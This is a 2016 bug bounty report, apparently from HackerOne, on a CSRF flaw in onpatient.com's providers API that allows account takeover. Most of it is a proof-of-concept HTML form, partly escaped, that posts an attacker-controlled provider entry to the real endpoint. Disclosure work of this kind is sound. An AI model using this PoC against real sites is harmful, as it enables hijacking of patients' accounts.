drchrono: [CRITICAL] CSRF leading to account take over

2016-05-27T04:08:39
ID H1:141344
Type hackerone
Reporter sysecure
Modified 2016-06-14T22:54:02

Description

Hi , I have found a CSRF issue that allows an attacker to link his email account to the victim's account and hijack the whole account by adding himself in the providers list .

The link: https://onpatient.com/api/v3/providers

Content-Type: application/json Vary: Accept Allow: GET, POST, HEAD, OPTIONS

[ emails of providers ]

Here is the poc

> <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <div class="tab-pane active" id="post-object-form">

                    &lt;form action="https://onpatient.com/api/v3/providers" method="POST" enctype="multipart/form-data" class="form-horizontal" novalidate=""&gt;
                      &lt;fieldset&gt;

<input type="hidden" name="csrfmiddlewaretoken" value="oCSe26NkXpcEJ0X6MQzpZvFVfGY9M5yX">

&lt;div class="form-group"&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Patient
&lt;/label&gt;

<div class="col-sm-10"> <select class="form-control" name="patient">

        &lt;option value="213477"&gt;saleh ss&lt;/option&gt;


&lt;/select&gt;

</div> </div>

&lt;div class="form-group "&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Name
&lt;/label&gt;

<div class="col-sm-10"> <input name="name" class="form-control" type="text">

</div> </div>

&lt;div class="form-group "&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Specialty
&lt;/label&gt;

<div class="col-sm-10"> <input name="specialty" class="form-control" type="text">

</div> </div>

&lt;div class="form-group "&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Fax
&lt;/label&gt;

<div class="col-sm-10"> <input name="fax" class="form-control" type="text">

</div> </div>

&lt;div class="form-group "&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Email
&lt;/label&gt;

<div class="col-sm-10"> <input name="email" class="form-control" type="email">

</div> </div>

&lt;div class="form-group "&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Phone
&lt;/label&gt;

<div class="col-sm-10"> <input name="phone" class="form-control" type="text">

</div> </div>

&lt;div class="form-group "&gt;

&lt;label class="col-sm-2 control-label "&gt;
  Address
&lt;/label&gt;

<div class="col-sm-10"> <textarea name="address" class="form-control"></textarea>

</div> </div>

<!-- form.non_field_errors -->

                        &lt;div class="form-actions"&gt;
                          &lt;button class="btn btn-primary" title="Make a POST request on the Provider List resource"&gt;POST&lt;/button&gt;
                        &lt;/div&gt;
                      &lt;/fieldset&gt;
                    &lt;/form&gt;

                &lt;/div&gt;

</body> </html>